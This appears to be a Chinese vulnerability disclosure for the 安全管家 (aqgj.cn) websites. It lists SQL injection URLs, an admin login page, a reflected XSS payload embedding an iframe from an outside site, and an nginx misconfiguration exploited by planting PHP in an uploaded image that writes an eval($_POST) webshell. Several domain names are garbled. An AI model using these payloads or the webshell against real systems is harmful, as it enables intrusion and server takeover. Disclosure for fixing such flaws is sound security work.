简要描述: 多个注射+nginx配置不当,直接getshell 详细说明: 117.135.130.111 -[5] - nginx/0.9.3 http://bbs.anguanjia测试数据 http://bbs.aqgj.cn http://wap.anguanjia测试数据 http://HdhCmsTestanguanjia测试数据 http://HdhCmsTestanquanguanjia测试数据 后台 http://HdhCmsTestaqgj.cn/admin/login.htm 官网注入 http://HdhCmsTestaqgj.cn/job_content.php?id=15 http://HdhCmsTestaqgj.cn/plug/search_cont.php?id=19 盲注 http://HdhCmsTestaqgj.cn/countfriendlink.php?id=58&link= 搜索反射xss (顺便提提,可以忽略) http://HdhCmsTestaqgj.cn/plug/search.php?key=%3Ciframe%20width=800px%20height=600px%20src=http://gesong.org%20%3E%3C/iframe%3E WAP页面N个注射 http://m.aqgj.cn/wap/?a=info&id=75&m=Soft&t=x http://m.aqgj.cn/wap/?a=down&id=254&m=Soft&softid=75&t=x http://m.aqgj.cn/wap/?m=Soft&stid=5&t=x 路径 (不可避免,php容错关不关都可以) http://bbs.aqgj.cn/uc_server/control/admin/db.php - /data/nginx/html/bbs/uc_server/control/admin/db.php 还有一个nginx配置不当 (都在一个服务器,果断全军覆没) http://bbs.aqgj.cn/static/image/common/logo.png/.php 上传任意图片,插入php代码 <?PHP fputs(fopen('x.php','w'),'<?php eval($_POST[x])?>');?> 然后访问图片/.php,直接getshell 漏洞 证明: http://HdhCmsTestaqgj.cn/test.txt 修复方案: 后台潜了吧,露出来多危险。 nginx配置请参考:http://HdhCmsTest2cto测试数据/Article/201005/47604. html 至于注射神马的,你懂的。 版权声明:转载请注明来源 歌颂
查看更多关于安全管家网站多个注射+nginx配置不当漏洞及修复的详细内容...